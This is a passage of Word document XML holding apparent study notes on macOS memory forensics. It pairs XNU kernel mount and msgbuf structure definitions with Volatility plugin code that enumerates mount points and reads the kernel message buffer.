        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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cache the rootvp of the last mount poin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in the chain in the mount struct pointed</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to by the vnode sitting in '/'</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this cache is used to shortcircuit th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mount chain traversal and allows us</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to traverse to the true underlying rootvp</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in 1 easy step inside of 'cache_lookup_path'</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make sure to validate against the cached vid</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in case the rootvp gets stolen away sinc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we don't take an explicit long term referenc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on it when we mount i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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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vnode_t     mnt_realrootvp</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    uint32_t    mnt_realrootvp_vid</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bumped each time a mount or unmoun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occurs... its used to invalidat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mnt_realrootvp' from the cache</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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uint32_t             mnt_generation</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sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</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if 'MNTK_AUTH_CACHE_TIMEOUT' is </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set, then 'mnt_authcache_ttl' is</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the time-to-live for the per-vnode authentication cach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on this mount... if zero, no cache is maintained...</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if 'MNTK_AUTH_CACHE_TIMEOUT' isn't set, its the</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time-to-live for the cached lookup right for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRPr="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     * volumes marked 'MNTK_AUTH_OPAQUE'.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     */</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     mnt_authcache_ttl</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sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        fstypename_override</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MFSTYPENAMELEN</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRPr="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRPr="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC"/>
    <w:p w:rsidR="00A36082" w:rsidRDefault="00A36082" w:rsidP="00A36082">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc445313263"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enum mount point info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">        mountlist_addr = self.addr_space.profile.get_symbol("_mountlist")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">        mount = obj.Object("mount", offset = mountlist_addr, vm = self.addr_space)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">        mount = mount.mnt_list.tqe_next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        while mount:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">            yield mount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">            mount = mount.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F524D4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>mnt_list</w:t>
      </w:r>
      <w:r>
        <w:t>.tqe_next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00A36082" w:rsidP="007C736F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B61E0">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\volatility-master\volatility\plugins\mac</w:t>
      </w:r>
      <w:r w:rsidRPr="006B61E0">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\mount.py</w:t>
      </w:r>
      <w:r w:rsidR="00F524D4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B61E0" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Mount to name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">     mount.mnt_vfsstat.f_mntonname </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Mount from</w:t>
      </w:r>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4"/>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">     mount.mnt_vfsstat.f_mntfromname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4"/>
    <w:p w:rsidR="008910BC" w:rsidRPr="008910BC" w:rsidRDefault="008910BC" w:rsidP="008910BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008910BC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Mount </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="008910BC"/>
    <w:p w:rsidR="00F524D4" w:rsidRPr="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="00F524D4">
      <w:r>
        <w:t xml:space="preserve">     mount.mnt_vfsstat.f_fstypename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F524D4" w:rsidRDefault="00F524D4" w:rsidP="008910BC"/>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc445313264"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dmesg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRPr="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7262">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\msgbuf.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   msgbuf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgbufp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRPr="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262"/>
    <w:p w:rsidR="00604427" w:rsidRDefault="003C7262" w:rsidP="00604427">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc445313265"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msgbuf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="008910BC"/>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">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MAX_MSG_BSIZE   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  msgbuf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">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MSG_MAGIC   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x063061</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     msg_magic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     msg_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     msg_bufx</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write pointer */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     msg_bufr</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read pointer */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>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char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msg_bufc</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buffer */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="008910BC"/>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc445313266"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enum dmesg buffer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427"/>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427">
      <w:r>
        <w:t xml:space="preserve">        msgbuf_ptr = obj.Object("Pointer", offset = self.addr_space.profile.get_symbol("</w:t>
      </w:r>
      <w:r w:rsidRPr="00604427">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_msgbufp</w:t>
      </w:r>
      <w:r>
        <w:t>"), vm = self.addr_space)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427">
      <w:r>
        <w:t xml:space="preserve">        msgbufp = msgbuf_ptr.dereference_as("</w:t>
      </w:r>
      <w:r w:rsidRPr="00604427">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msgbuf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">") </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427"/>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427">
      <w:r>
        <w:t xml:space="preserve">        bufx = msgbufp.</w:t>
      </w:r>
      <w:r w:rsidRPr="00604427">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msg_bufx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00604427" w:rsidRDefault="00604427" w:rsidP="00604427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        size = msgbufp.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7262">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msg_size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="00604427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="003C7262" w:rsidP="00604427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="00167026" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc445313267"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidR="003C7262">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7262" w:rsidRDefault="00AA6190" w:rsidP="003C7262">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc445313268"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="00AA6190" w:rsidRPr="00AA6190" w:rsidRDefault="00AA6190" w:rsidP="00AA6190">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
